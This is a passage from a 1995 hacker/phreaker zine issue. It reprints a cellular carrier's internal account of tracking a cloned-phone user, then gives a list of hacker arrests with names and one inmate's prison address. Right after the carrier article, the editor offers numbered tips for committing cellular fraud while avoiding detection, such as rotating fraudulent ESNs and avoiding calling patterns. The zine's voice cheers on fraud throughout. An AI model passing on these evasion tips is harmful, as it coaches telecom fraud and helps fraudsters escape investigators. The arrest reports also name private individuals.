home *** CD-ROM | disk | FTP | other *** search
/ Group 42-Sells Out! - The Information Archive / Group 42 Sells Out (Group 42) (1996).iso / zines / cotno / cotno06.txt < prev    next >
Text File  |  1995-11-30  |  171KB  |  3,578 lines

  1.        ______         ______     _____________      ____      ___     ______
  2.       /  ____|\      /      \   /____    ____/\    /   | \  /   / |  /      \
  3.     /  /  ____\|   /   __    |\  \_/   /\____\/  /     |  /   /  / /   __    |\
  4.   /  /  /        /   /__/   / |  /   /  /      /   /|  |/   /  / /   /__/   / |
  5. /  /__/______   |         /  / /   /  /      /   /  |     /  /  |         /  /
  6. |____________|\ |\_____ /  / /__ /  /      /___/  / |___/  /    |\_____ /  /
  7. |_____________\| \|____| /   \__\ /       |___ |/   |___|/       \|____| /
  8.  
  9.                                    ____
  10.                                   /    \ --- 
  11.                                 /        \   \ __  
  12.                               /     /\     \   \  \   
  13.                            _/______|_/    /   /   / \  
  14.                           |          |  /   /   /  / 
  15.                           |    ---\( |/   /   /  / 
  16.                           |         \|\(/ \(/\(/    
  17.                           |                   |   
  18.                           /                  /
  19.                         /    \             /
  20.                       /         \     ___/
  21.                                      /  
  22.                                    /    
  23.                                  /      
  24.  
  25.                       Communications of The New Order
  26.                                 Issue #6
  27.                                Fall 1995
  28.                                
  29.  
  30.         "There is nothing more difficult to take in and, more perilous 
  31.         to conduct, or more uncertain in its success, than to take the 
  32.         lead in a new order of things."                                    
  33.                         
  34.                                         - Niccolo Machiavelli'
  35.  
  36.  
  37.          Cavalier........"I hacked codes to get warez for free drugs."
  38.          Dead Kat........"I have non-hacker friends but fuck if I keep in 
  39.                           contact with them, they don't have k0d3z."   
  40.          Disorder........"US West knew we were getting their stuff, they
  41.                           just didn't know we were on the deferred payment
  42.                           plan."
  43.          Edison.........."I said fuck you cop.. well I wish I had said that."         
  44.          Major..........."SUNOS... the swiss cheese of unix."
  45.          Voyager........."I don't think money is as powerful as fear, but 
  46.                           I have a day job."                              
  47.          
  48.  
  49.                          
  50.  
  51.          Special Thanks:  Gatsby, Mark Tabas, The Doktor, Presence,                      
  52.          Demonika, Rage (303), Invalid Media, Deathstar, KevinTX,
  53.          Intrepid Traveler, Plexor, yLe, Drunkfux, Damien Thorne, 
  54.          Brownstone, Storm Bringer, Neophyte, Ole Buzzard, AntiChrist,
  55.          Redboxchilipepper, El Jefe, Jupiter, Captain Hemp.
  56.  
  57.          Good Luck:  Mark Tabas, Gatsby, Kevin Crow, Dispater, St. Elmo,
  58.          Zibby, Dr. Delam, Phantom Phreaker, Purple Condom, Manson, 
  59.          BernieS, Kevin Mitnick, Alphabits.
  60.  
  61.                               
  62. <CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
  63.                               
  64.                               
  65.                               
  66.                               __/\iNTRo/\__ 
  67.                      
  68.  
  69. CoTNo is a 'zine of the computer underground of the 1990's.  It is written
  70. for H4Qu3r's and pHR3aCK3r's of intermediate to beginning experience.  All
  71. the information published herein is as accurate as possible and pertains to
  72. techniques and devices that actually work.  We do not publish any article
  73. that is not of an H/P nature.  If you wish to comment on or contribute to 
  74. CoTNo, email one of us, or catch one of us on the iRC or try to catch 
  75. us in your local Telco dumpster.
  76.  
  77. Ahem...
  78.  
  79. This issue is dedicated to all of our good friends who have recently been
  80. busted.  In fact, the last three issues are dedicated to them, since there
  81. have been more people busted in the last twelve months then at any time since
  82. Sundevil.  In issue four I espoused my opinion that there was a federal
  83. conspiracy at work with paid informants masquerading as our friends.  Last
  84. issue I gave detailed information on one of our own busted members, John
  85. Falcon.  In this issue there will be information you can use to help keep 
  86. yourself out of jail.
  87.  
  88. In this issue, Disorder has compiled detailed information on the busts of 
  89. lasts twelve months.  Each bust that we heard of is detailed with names and
  90. events.  Hindsight is always clearer than foresight, so hopefully you can
  91. learn from these busts how to avoid a similar fate.  Also in this issue, I
  92. am releasing confidential information on how cellular fraud is prevented.  
  93. The information is straight from a national cellular carrier and details 
  94. exactly how the telcos detect, trace, and bust cellular abuse.  This
  95. information should convince you to take the utmost precautions if you are 
  96. experimenting with cellular technology.  Lastly, John Falcon sent me an 
  97. article on what to do if you do get busted.  I think this is the first H/P
  98. article ever written from jail!  
  99.  
  100. The following information was an actual article from Cellular One that was
  101. distributed to some of their employees.  This article was not edited in
  102. anyway, and contains the best information I have ever seen on how cellular
  103. fraud is prevented.  If you are participating in cellular phreaking, I 
  104. recommend that you read this article very closely and take it as a warning
  105. from the Cellular Telephone industry.  They are getting serious about halting 
  106. cellular fraud, and for good reason.  In New York for instance, often
  107. there are more fraudulent cellular calls than legitimate ones on any given 
  108. day!  The Fedz are on their side too.  As you may already know, the Fedz ran 
  109. an underground BBS for 8 months this year just to catch Cellular Fraudsters.
  110. In fact, Kevin Mitnick was recently busted using the same methods described 
  111. in the following article.                
  112.  
  113. The article, dated February 1995, follows: 
  114.  
  115. A team of five Cellular One employees helped stop cellular fraud in Denver 
  116. last week.  To protect both our employees and future investigations, 
  117. Cellular One team members names will not be released.
  118.  
  119. California officials tracked a suspect from the Los Angeles area using a 
  120. cloned cellular phone to Denver early last week and asked Cellular One for 
  121. assistance in locating this suspect.  With the cloned cellular phone number 
  122. and a number the suspect repeatedly called in California, the five Cellular 
  123. One employees and both local and California law enforcement agents began 
  124. tracking the whereabouts of the suspect through the pattern of his cellular 
  125. phone calls.
  126.  
  127. Using AMA searches, RFCALL Trace, directional antennas, an IFR 1500, an 
  128. RSAT Plus, and hours of labor, the Cellular One team identified the suspect's 
  129. calling patterns.  An AMA search is a record of an individual cellular 
  130. phone number's calls.  The cellular number is input along with the 
  131. parameters for the search - start and finish date and time - and a log is 
  132. printed which shows each individual call made by that cellular number.  
  133. This tool is used generally within three days of the calls which you wish 
  134. to observe.  AMA searches were compiled over several days to document the 
  135. calling patterns of the suspect.
  136.  
  137. While the AMA searches show the past calling pattern, when attempting to 
  138. capture a cellular fraud suspect, real time tools must also be used.  The 
  139. Cellular One team used RFCALL Trace which tracks similar information as an 
  140. AMA record with the exception that the information can be collected with 
  141. only a 10 second delay from real time.  RFCALL Trace also tracks the 
  142. individual radio in use, any handoffs, and the signal strength of 
  143. the cellular call.  Law enforcement agents issued a subpoena to Cellular One 
  144. for all information regarding the fraudulent cellular phone number's 
  145. activity on our system.
  146.  
  147. Most of the fraudulent phone calls were being placed between 10am and 
  148. midnight.  Tracking which cell sites, cell faces, and radios the suspect's 
  149. calls set up on identified a small geographical area as the suspect's base of 
  150. action.  Once an area had been established, one team member drove this area 
  151. using an RSAT Plus, an IFR 1500, and a directional antenna (all basic 
  152. cellular test equipment used in system optimization) to pinpoint the suspect's 
  153. location to a specific apartment complex.  This team me tracked the calls 
  154. made by the suspects's cellular number and, watching the faces serving the 
  155. calls and he handoffs made by the system during the suspect's calls, he was 
  156. able to narrow down the location from which the calls were made to a specific 
  157. side of one apartment building.
  158.  
  159. The law enforcement agents, equipped with their own brand of cellular fraud-
  160. busting tools, asked if the Cellular One team could identify the actual 
  161. apartment within the building where the calls were being placed.  A narrowband 
  162. directional antenna was set to the transmit frequency of the cloned phone.  
  163. One problem was that with each new phone call, the frequency being tracked 
  164. changed.  The suspect made short calls, most around one minute, with the 
  165. longest between three to five minutes.  Using the directional antenna 
  166. and resetting the frequency with each new call on the cloned phone, the 
  167. Cellular One employee identified a group of apartments within the building 
  168. from which the cellular calls were being placed.
  169.  
  170. Unfortunately, the suspect slipped out of the building before the specific 
  171. apartment was identified.  Again using RFCALL Trace, the Cellular One team 
  172. logged the suspect's next phone call on a cell site near Stapleton 
  173. Airport.  Law enforcement was notified and kept aware of the phone calls as 
  174. the suspect traveled throughout the system.  It became evident that the 
  175. suspect was moving back toward the apartment complex.  Surveillance 
  176. officers outside the apartment noticed three men enter just moments before 
  177. the Cellular One team notified them that a call had been placed from the 
  178. apartment.  Within 20 minutes, the suspects again left the apartment.  
  179. Denver Police began pursuit of the suspect and made the arrest.  Five 
  180. additional cellular phones were found in the suspect's apartment.  It has 
  181. not been determined if these phones are cloned.
  182.  
  183. Although cellular fraud exists, it is possible to catch the criminals.  
  184. Congratulations to our fraud busters!  Cellular One asks that you keep this 
  185. story confidential since the specifics of this and future investigations 
  186. depend on our ability to catch the criminals in action.
  187.  
  188. End of Cellular One Article.
  189.  
  190. Pretty scary, huh?  Cellular phreaking used to be considered pretty safe, but
  191. times have changed.  The cellular phone companies are losing so much money on
  192. cellular fraud, that they have made busting the cellular hackers a priority.
  193. If you do commit cellular fraud, I suggest you use the following guidelines:
  194.  
  195. 1.  Never use the fraudulent ESN for over two weeks.
  196. 2.  Change ESN's as often as possible.
  197. 3.  Avoid creating a calling pattern with your fraudulent ESN.
  198. 4.  Avoid using the fraudulent ESN from a stationary location.
  199.  
  200. These tips could keep you out of jail!  Because you cannot divert with a 
  201. cellular phone (unless you are Kevin Mitnick) these precautions are necessary.
  202. As my friend John Falcon told me, "Its not worth doing time for silly phone
  203. shit."  He's right.  H/P is fun, but anyone who has gotten busted will tell
  204. you the same.
  205.  
  206. But if despite these warnings, you still decide to cellular phreak, just make
  207. this quote from Gatsby your mantra, "An ESN a day, keeps the federals away."
  208.  
  209. |>ead|<at
  210. -=(TNo)=-
  211.  
  212.  
  213.         Table of Contents
  214.         ~~~~~~~~~~~~~~~~~
  215.         Introduction......................................Dead Kat
  216.         Operation Phundevil...............................Disorder
  217.         What Happens When You Get Caught..................John Falcon
  218.         Legal and Technical Aspects of RF Monitoring......Major
  219.         The Tao of 1AESS..................................Dead Kat & Disorder
  220.         Frequently Visited AT&T Locations.................Major & Dead Kat
  221.         Remote Hacking in Unix............................Voyager
  222.         The Definity Audix VMS Inside Out.................Boba Fett        
  223.         Bridging the Gap..................................Eddie Van Halen
  224.         Elite Music Part V................................Disk Jockey
  225.         Conclusion........................................Dead Kat
  226.  
  227.  
  228.  
  229.  
  230. <CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
  231.  
  232.  
  233.                        
  234.                        -= Operation Phundevil =-
  235.  
  236.                            by DisordeR[TNo]
  237.  
  238.  
  239.         With all the busts happening in the past year, and a lack of
  240. information in the scene regarding who got busted when, and for what,
  241. I decided to put this article together. After working on this for a
  242. while, I realized that not only was it a little difficult in finding
  243. bust info, but half of the little you found was bullshit. 
  244.  
  245.         The information in the following article is as accurate as I
  246. can find. With all the different accounts of what happened, different
  247. nicknames, different NPA's, and pure stupidity out there, don't bet your
  248. life on the information contained within this article.
  249.  
  250.         The following sections give you some details about some busts,
  251. and RUMORS of others. I indicate which are rumors and which are legit.
  252. I utilized everything from BBS posts, to newspaper articles, to word
  253. of mouth. Thanks to those who helped me on this. And by no means is this
  254. NEAR complete...
  255.  
  256. =-=
  257.  
  258. "OPERATION CYBERSNARE:  FEDZ = 1, PHREAKZ = 0"
  259.  
  260. Main Thugs:
  261.   Peter A. Cavicchia II -  Special Agent in Charge
  262.   Donna Krappa - Assistant U.S. Attorney in Newark
  263.   Stacey Bauerschmidt - "Carder One"
  264.  
  265. The Busted:
  266.   Richard Lacap - "Chillin" - Katy, Texas: Accused of conspiring to break
  267.      into the Portland, Oregon AT&T Wireless computers.
  268.   Kevin Watkins - "Led" - Houston, Texas:  Accused of conspiring to break
  269.      into the Portland, Oregon AT&T Wireless computers.
  270.      Watkins used the computer system of Embry Riddle University in
  271.      Prescott, Ariz., to enter the McCaw computer, Secret Service
  272.      Special Agent Stacey Bauerschmidt said in a sworn statement.
  273.   Jeremy Cushing - "Alpha Bits" - Huntington Beach, California: Accused
  274.       of trafficking in cloned cellular phones/equipment and stolen
  275.       access devices (ESN/MIN Pairs).
  276.   Frank Natoli - "Mmind" - Brooklyn, New York: Accused of trafficking in
  277.       stolen access devices.
  278.   Al Bradford - "Cellfone" - Detroit, Michigan: Accused of trafficking in
  279.       unauthorized access devices.
  280.   Michael Clarkson - "Barcode" - Brooklyn, New York: Accused of possessing
  281.       and trafficking in hardware used to obtain unauthorized access to
  282.       telecommunications services.
  283.  
  284. Penalty:
  285.         If convicted, defendants face maximum possible sentences ranging
  286. from 15 years for Cushing to 10 years for Bradford, Clarkson and
  287. Natoli and five years for Lacap and Watkins.
  288.  
  289. Details:
  290.         Starting in January, Stacey Bauerschmidt and other Secret Service
  291. agents in Newark, NJ, set up what is now called "an electronic chop shop"
  292. by the press. Stacey (in cooperation with a 'nameless informer' who will
  293. be mentioned later) set up a computer BBS called "Celco 51" with the
  294. intent of busting hackers and phreakers specializing in cellular phone
  295. fraud.
  296.         For the first sixth months, the board operated using MBBS with
  297. four nodes. At any given time the board had an 800 re-route (not really)
  298. so that the users could call without any problem (ANI). To the credit of
  299. the agents in charge, the board did not allow just anyone access. The sysop
  300. (PMF) appeared to discriminate and only allow the 'elite' members of the
  301. H/P community on. With the illusion of security, the agents running the
  302. board could successfully monitor the users, and begin to make deals with
  303. the hackers.
  304.         Stacey [Who went by 'Carder One'] continually asked members of the
  305. BBS if they were interested in selling ESN/MIN pairs [Used for cellular
  306. phone fraud]. These 'pairs' are considered 'illegal access devices' and
  307. are usually found in large enough amounts to consist of felonies. On top
  308. of the illegal access devices, Stacey was looking for people that were
  309. willing to sell illegal cloning equipment. This equipment consisted of
  310. devices used to get pairs, clone phones, and reprogram phones.
  311.         The operation was very successful in many ways, notably the ability
  312. of the agents to mask the true nature of the board. For over eight months,
  313. Stacey and other agents monitored the board looking for any chance to
  314. prosecute any of the members. The sysop (PMF) continuously advertised the
  315. board to the members, as well as mailed and HARASSED members into calling
  316. more than they wished to (Entrapment anyone?). PMF was responsible for
  317. mailing members up to three times a day, message flooding people on IRC,
  318. and using other methods of harassment to get hackers to call.
  319.         On top of the harassment, Carder One continuously asked for people
  320. to post 'pairs' as well as sell them in private. In a few cases, individuals
  321. would not have considered selling these pairs had the federal agents not
  322. harassed them so much. Ahem.
  323.  
  324.         "Cushing and five others were arrested in four states during a
  325. sweep last week by federal agents. Another 14 raids spread over eight
  326. states led to the confiscation of 31 computers, 65 illegally programmed
  327. phones and 14 "readers," devices used to illegally pluck cellular phone
  328. numbers and serial codes from cellular phone transmissions."
  329.         [Wonder who's computer will run the next sting board?]
  330.  
  331.         "But because the alleged crooks posted phone numbers on the bulletin
  332. board indicating where they could be reached, the Secret Service was able to
  333. trace the calls, leading to the arrests."
  334.         [Need we emphasize the importance of Diverting any more?]
  335.  
  336.         "But officials said this case represented the first time that the
  337. Secret Service had created an entirely new computer bulletin board..."
  338.         [Couldn't bust any warez kiddies recently...]
  339.  
  340. [Watch out kiddies... They are using more than 'questionable' methods
  341. of busting hackers and phreaks these days. If you haven't met someone,
  342. be careful of what you post on their systems.. many people thought
  343. PMF was cool until he NARKED on everyone that he could.]
  344.  
  345. =-=
  346.  
  347. "ANARCHIST BUSTED FOR WRITING MAGAZINE"
  348.  
  349. From: The Anarchives <tao@presence.lglobal.com>
  350.  
  351. In early march of 1995 I was arrested for "Unauthorized Use Of A Computer".
  352.  
  353. Three large, white, plain-clothes detectives from 52 division in downtown
  354. toronto came to my house, promptly arrested me, took me to a holding
  355. cell, and conducted a strip search (looking for codes I guess). I was
  356. held in custody for four hours (7:30 pm to 11:30 pm), and released as a
  357. result of substantial protest made by friends and family at the sergeants
  358. desk.
  359.  
  360. I was being accused of breaking into the computer systems at the
  361. University Of Toronto for the purpose of publishing "Anarchist
  362. newsletters".
  363.  
  364. The sysadmin of ecf.utoronto.ca, one Professor Jack Gorrie
  365. <gorrie@ecf.utoronto.ca>, saw someone on his system publishing Anarchist
  366. materials, assumed I was a malicious "hacker", turned over all records of
  367. my email, news posts, key strokes, you name it, to the police at 52
  368. division. The police realizing how dangerous these "hacker anarchist"
  369. types are, had to come to my house to cuff me, bring me down, and strip
  370. search me.
  371.  
  372. I was to face trial for a possible six months in prison, just for
  373. exercising my democratic rights and responsibilities.
  374.  
  375. Of course the end result was that the charges were dropped, although this
  376. was not until several months later (sept 7, 95), after several
  377. appearances in court, and after my agreeing to pay $400 to the skule.
  378.  
  379. =-=
  380.  
  381. "FEDS SAY HACKERS CRACKED INTO TOWER CREDIT CARD RECORDS"
  382. by, Denny Walsh
  383.  
  384. From: The Sacramento Bee
  385. Saturday Sept. 16, 1995
  386.  
  387.         Two talented Berkeley hackers were charged Friday with computer-
  388. age crimes against a Tower Video rental store in Sacramento, federal
  389. authorities said, in large part because they went up against Tower's even
  390. more talented electronic security corps.
  391.  
  392. When authorities raided their apartment last month, Terry Patrick Ewing,
  393. 21, and Michael Yu Kim, 20, had the credit card numbers of 2,000 Tower
  394. customers, federal prosecutors said.
  395.  
  396.         According to a federal grand jury indictment, Ewing and Kim used
  397. their personal computer to break into a system know as TRON, owned and
  398. operated by Tower's West Sacramento-based parent, MTS Inc.
  399.  
  400.         Kim and Ewing are charged in a three-count indictment with
  401. conspiracy, fraud and the unauthorized destruction of computer data.
  402.  
  403.         The prosecutor said the pair are not in custody and will be
  404. allowed to surrender next week. He said he does not see them as flight 
  405. risks.
  406.  
  407. =-=
  408.  
  409. "KEVIN MITNICK BUST - HIGHLIGHTS"
  410.  
  411. From Multiple Sources
  412.  
  413. If you want more details, read the hundreds of articles about this story.
  414. Also, read the Phrack 47 editorial pertaining to this subject.
  415.  
  416. Kevin Mitnick (31)
  417. -One of the first indicted under Computer Security Act of 1987
  418. -Search began in November 1992
  419. -Mark Seiden (expert in firewalls) discovered that someone had obtained
  420.  all of Netcom's credit card numbers for 20,000 online subscribers.
  421. -Stole files from: Motorola, Apple, Netcom, and more.
  422. -Mitnick used the Well as a repository for files he stole from computer
  423.  security expert Tsutoma Shimomura.
  424. -After raping Tsutoma, he used Bruce Koball's account to transfer
  425.  proprietary software from Motorola, NEC, Nokia, Novatel, Oki, Qualcomm,
  426.  and other cell manufacturers.
  427. -Shimomura concluded that it was Mitnick, and that he was operating
  428.  through cellular, from Raleigh, NC
  429. -Mitnick was bouncing his calls through GTE Switches, local switches,
  430.  and a few types of cellular switches, and utilized Netcom's dialins.
  431. -Lived in Player's Court, a 12-unit apartment building in suburb of 
  432.  Duraliegh Hills, three miles from the airport. He lived in Apt 202.
  433. -Until a week or two before he was arrested, FBI surveillance agents in
  434.  Los Angeles were certain that 'the intruder' was somewhere in Colorado.
  435. -FBI arrested him at 24 hour stakeout
  436. -Arrested in Raleigh, N.C. at 1:30 a.m.
  437.  
  438. =-=
  439.  
  440. "PHREAKS BUSTED IN NY... MORE TO COME"
  441.  
  442. "Ok all Listen up and listen good. resistance is down. Maybe permanently. Most
  443. of you prolly haven't heard yet, but there have been major busts going around.
  444. ... Today alone i found out that Neon Samurai, Tokien Entry, and Hellfire 
  445. have been busted. ... that they even busted craig neidorf(knight lightnig) 
  446. again. 
  447.  
  448. More bad news. If you are on UPT(unphamiliar territory) or Cellco 51, stop
  449. calling. The SS who raided hellfire slipped a bit and bragged about being on
  450. those boards. 
  451.  
  452. Hellfire said the feds were mostly interested in credit cards,
  453. VMB's, and Cell phones. 
  454.  
  455. They are looking to bust for cellular, VMB's and credit cards...
  456.  
  457. Tokien entry i found out has been in jail for 2 days! 
  458. Neon Samurai was busted for credit cards and also for telco equipment that 
  459. the nynex people said was worth 50,000. "
  460.  
  461.  
  462. PMFs (Narc) reply:
  463.  
  464. "dude, this is utter shit and i expect u to post this reply for me seeing 
  465. as i ain't on that bbs.. Hellfire gave up his accounts to UPT and my bbs 
  466. among others, he was the only person busted and nothing to do with his 
  467. busts was EVER mentioned on my board. He doesn't even get involved in 
  468. cellphones, he was busted coz he and every other person busted used 
  469. 1 800 CALL ATT from his house.. what a bunch of lamers... I don't even 
  470. know who wrote that next but i would like to find out.. probably the guys 
  471. from NYHE..."
  472. [Ironic isn't it!]
  473.  
  474. =-=
  475.  
  476. "ALPHABITS ORIGINAL BUST LAST YEAR"
  477.  
  478. Caught alphabits on irc lastnight and he said:
  479.  
  480. <alphabits> but I got sent to prison 7 months ago, and lost contact ***
  481.  
  482. According to different people, he was busted for check fraud and/or credit
  483. fraud and/or cellular fraud. Unfortunately, I will not be able to talk
  484. to him until after this article.
  485.  
  486. =-=        
  487.  
  488. "SYNCOMM, MEMBER OF S.O.B (SERVANTS OF BABUSHKA) RAIDED"
  489.  
  490. From another group member:
  491.  
  492. Syncomm was talking on the phone.. the day before Master of Reality got 
  493. busted... so MOR, Greg and equinox were sitting there chatting away when 
  494. a load of federal agents <SS, FBI, 1 NSA guy and even a guy from customs> 
  495. and some local police busted down his door. He dropped the phone and all 
  496. they heard was a rustle of papers .. then a "Secure that paper!" then a 
  497. click.. They put a shotgun to his head and said "Hello Syncomm". They 
  498. said he was the leader of S.O.B. an international terrorist organization. 
  499. Then again they thought that Crypt Keeper and MOR were also the sole 
  500. leader of SOB ... So then they put a knee to his back and handcuffed him 
  501. <Greg, 16, apparently posed a serious threat>. They proceeded to 
  502. interrogate.. and at one point this one agent <female> tried to seduce him 
  503. into talking <I think he would of he she did more .. ;)> .. 
  504.  
  505. He was finaly was lead outside when his neighbor walked up to them and 
  506. handed them all of Greg's notes, etc.. that greg had asked him to stash..
  507. Greg then threatened his neighbors life.. <which he came back to do 
  508. unhandcuffed afterwards> and was led off to holding... were they produced 
  509. "A big fucking printout" that apparently detailed Greg's activities.. they 
  510. nailed him for hacking UC and then accused him of crashing their 
  511. systems.. Along with criminal tools <his computer> and some other 
  512. offenses.. <one of which I am sure of is Wire Fraud.. they love that>
  513.  
  514. =-=
  515.  
  516. "FBI REVEALS ARREST IN MAJOR CD-ROM PIRACY CASE"
  517.  
  518. SOFTWARE CRACKDOWN - Two Canadians were arrested in a blitz
  519. that has software companies upset to see piracy extending 
  520. into the CD-ROM format.
  521.  
  522. From the Associated Press, Saturday Dec 24 1994
  523.  
  524. BUFFALO, New York - The FBI has arrested a Canadian father and son in what
  525. is believed to be the first major case of CD-ROM piracy in the United States.
  526.  
  527. Agents said Thursday they seized 15,000 counterfeit copies of the popular 
  528. CD Rom games  REBEL ASSAULT and MYST that were being sold at 25% of retail
  529. value.
  530.  
  531. PETER MISKO, 63, of Mississauga, Ontario, and his son, BRUCE MISKO, 36, of
  532. CHICAGO were arrested in Buffalo and charged with felony copyright infringe-
  533. ment.  The counterfeit goods were recovered in a Niagara Country warehouse
  534. authorities said.
  535.  
  536. The FBI told the Los Angeles Times that additional warrants were served in
  537. INDIANA and NEW HAMPSHIRE as part of a crackdown on retail stores selling
  538. the illegal software.  MORE ARRESTS ARE EXPECTED.
  539.  
  540. =-=
  541.  
  542. "MULTI-COUNTRY EFFORT CRACKS COMPUTER RING"
  543.  
  544. TORONTO -  Canadian, US and European investigators
  545. have cracked a ring of computer hackers who allegedly
  546. stole about $5 million US$ by breaking into the 
  547. computers of phone companies and other firms.
  548.  
  549. The 12 hackers who met over the Internet, used coding
  550. and call switching to conceal the transfer of funds,
  551. codes and communications.
  552.  
  553. RUDY LOMBARDI, 22, of MISSISSAUGA Ontario PLEADED
  554. GUILTY on Tuesday, June 27 1995.  He got 90 days in
  555. Jail and 100 hours of community services for HELPING
  556. the RCMP with their investigation - instead of at least
  557. a one year jail sentence.  
  558.  
  559. =-=
  560.  
  561. "RUMORS FROM 914" 
  562.  
  563. There has been a huge chain of busts in 914. Apparently, GANGSTER,
  564. who ran a board in 914 called 'Bamboozie Dimension' was busted. Rumor
  565. goes on to say that he was 'fucking around with CC's' which led to the 
  566. bust.
  567.  
  568. =-=
  569.  
  570. "WAREZ BUSTS IN 510"
  571.  
  572. The Sewer Line BBS in 510 met trouble on December 11th due to the  
  573. distribution of console warez (from various posts). Rumor also has it, 
  574. that a user on the board going by ROCK'N was in fact a sega representative, 
  575. and narked on the sysop for his activities.
  576.  
  577. =-=
  578.  
  579. "214 BUSTS"
  580.  
  581. During August of '94, several boards (mostly warez/ansi affiliated)
  582. were raided by the FBI. The busts occurred in the Dallas/Ft. Worth
  583. area, the list follows:
  584.           Agents of Fortune [409] (Sysop: Butcher [LEGEND])
  585.           Suburbia          [214] (Sysop: The Chairman [RZR], 
  586.           The Network       [214] (Sysop: Masterblaster)
  587.           The Depths        [214] (Sysop: Maelstrom ex-[RZR/iCE])
  588.           Elm Street        [214] (Sysop: Freddy Krueger)
  589.           User to User      [214] (Sysop: William Pendergast)
  590.  
  591. =-=
  592.  
  593. "PHILLY 2600 MEETING"
  594.  
  595. From recent posts and word of mouth, the Philadelphia 2600 meetings are
  596. having a hard time making it past 5 minutes. Apparently, local police in
  597. coordination with mall rent-a-cops [joining of forces there], are kicking
  598. hackers and phreakers out of their meeting place based on charges of
  599. loitering and conspiracy [to do what?! Assemble?]. Currently, police
  600. are threatening to break up meetings, and/or jail participants for the
  601. two reasons cited above. 
  602.  
  603. =-=
  604.  
  605. "FEDZ BUST KID IN MINNESOTA"
  606.  
  607. November '94, a 15 year old in Minnesota had a pleasant visit by 
  608. federal agents. According to newspaper articles, the boy [unnamed
  609. in the article] was basing his hacks out of the Detroit Free-Net.
  610. "He used passwords to gain access to more than 10 computer networks
  611. from Detroit to Moscow". During his time on the Detroit Free-Net, 
  612. he was said to have maliciously disabled enough of the system 'forcing'
  613. it to shut down. 
  614.    Currently, the boy is facing potential charges for using
  615. telecommunications devices to cross state lines, and felony charges
  616. for breaking into computer systems.
  617.    
  618.    Other favorite quotes from the articles about this case:
  619.    "...hospitalized, possibly for psychological reasons, when police
  620.     confiscated his computer modem and software programs Monday."
  621.  
  622.    "...said the boy appeared to fit the typical hacker profile: a 
  623.     15- to 20-year-old male, many who have low self-esteem. 'He really 
  624.     could use a girlfriend instead of a computer' Grewe said."
  625.  
  626. =-=
  627.  
  628. "THE TROUBLES OF BERNIE S."
  629.  
  630. Recently, a lot of press has been covering the story of 'Bernie S'.
  631. You can find more info about his bust on alt.2600 as well as several
  632. 'hacker' mailing lists. Here are some of the interesting quotes from
  633. one of those articles:
  634.  
  635.    "Ed Cummings, also known to many in cyberspace as Bernie SS was arrested
  636. on March 13th, 1995 for 2 misdemeanors of possession, manufacture and sale
  637. of a device to commit Telecommunications fraud charges. He is being held in
  638. Delaware County Prison in lieu of $100,000.00 Bail."
  639.    His arrest took place at a local 7-11 where *15* police cars pulled
  640. into the parking lot. During the interaction with the officer, he told
  641. them 'no, you can't search my car', yet minutes later, he noticed
  642. an officer going through the contents of his car. Despite his protests,
  643. the officer removed several timing crystals, tone dialers, and a 'broken
  644. red box'.
  645.    The following day, Bernie was at a friend's house when '8 to 10' plain
  646. clothed armed men burst into the house yelling 'freeze'. Minutes later
  647. he was being taken to jail in cuffs. He was not formally charged until
  648. his arraignment where his bail was set to 100,000 dollars because he
  649. refused to talk with the police without counsel present.
  650.    "The Judge dropped the two unlawful use of a computer charges due to
  651. the fact that the evidence was circumstantial and the county had no actual
  652. evidence that Ed had ever used the computers in question. As of 3/27/1995 
  653. Ed Cummings is still in Delaware County Prison awaiting his trial."
  654.  
  655. =-=
  656.  
  657. "RUSSIANS ARREST 6 IN COMPUTER THEFTS"
  658.  
  659. This article was taken from the Associated Press, Saturday Dec 24 1994   
  660.  
  661. St. Petersburg, Russia, Sept 26 (AP) -- Russian police
  662. officers have arrested six more people in a $10 million
  663. computer theft from Citibank here, but the masterminds are
  664. said to remain at large.
  665.  
  666. Several people have been arrested abroad and face charges
  667. in the United States, including Vladimir Levin, 28,
  668. reportedly the group's computer hacker.
  669.  
  670. Citibank officials said they recovered all but $400,000 and
  671. upgraded the cash-management systems's electronic security
  672. after the theft.
  673.  
  674.  
  675. FT, Sept 21, 1995.
  676.  
  677. Extradition in Citibank hacking case
  678.  
  679. A British court yesterday approved the extradition to the
  680. US of Mr Vladimir Levin, the Russian science graduate
  681. accused of an attempted $10m (6.5m pounds) computer hacking
  682. fraud on Citibank. ...
  683.  
  684. =-=
  685.  
  686. "PURPLE CONDOM CAUSES TROUBLE"
  687.  
  688. Purpcon recently had pleasant meetings with his Dean where he attends
  689. college after getting caught rewriting his magnetic student ID, so 
  690. that others would get charged for his meal. :)
  691.  
  692. =-=
  693.  
  694. "CoTNo RUMORS"
  695.  
  696. In past issues of CoTNo we have always said 'good luck to' people
  697. that have been busted (or said to have been busted)..
  698.  
  699. Deathstar, AntiChrist (school admins?), Coaxial Mayhem, 
  700. Maestro (Blueboxing?), Lucifer (still in jail?), Grappler (hacking),
  701. Jimbo (MCI Calling Card Fraud), Maelstrom, and Datastream Cowboy (hello
  702. CIA spooks), Merc, Crypt Keeper (keep reading), 602 crowd, and the 513 crowd.
  703.  
  704. At the request of some of the above, I can't go into details on their busts.
  705.  
  706. =-=
  707.  
  708. "JOHN FALCON BUSTS"
  709.  
  710. Since rumors about his bust have been running rampant on the 'Net', 
  711. here are the facts about the bust... for more info, and JF's reply
  712. to the rumors, read CoTNo 5.
  713.  
  714. Common myths of my arrest:
  715.  
  716. 1 - The FBI/NSA cracked my hard drive and read all my encrypted mail.
  717. 2 - Mr. Falcon left his secring.pgp on his system.
  718. 3 - FBI/NSA read the RSA encrypted data.
  719. 4 - My conviction was because I was a hacker.
  720.  
  721. Let me go over my conviction:
  722.  
  723. Count 1: Theft of Government Property - How they caught me: Narc
  724. Count 2: Fraudulent use of an Access Device - How they caught me: Narc
  725. Count 3: Fraudulent use of a Computer - How they caught me: questionable
  726. Count 4: Fraudulent use of an Access Device - How they caught me: Narc
  727.  
  728. If you would like to get in contact with JF, here is his info:
  729. email:  jfalcon@ice_bbs.alaska.net
  730. snailmail:  Don Fanning
  731.             #12617-006
  732.             3600 Guard Road
  733.             Lompoc, CA  93436
  734.  
  735.  
  736. =-=                        
  737.  
  738. "EPSILON, DAMIEN, SHOCKWAVE (303)"
  739.  
  740. From CoTNo 3 (Read there for full story)
  741.  
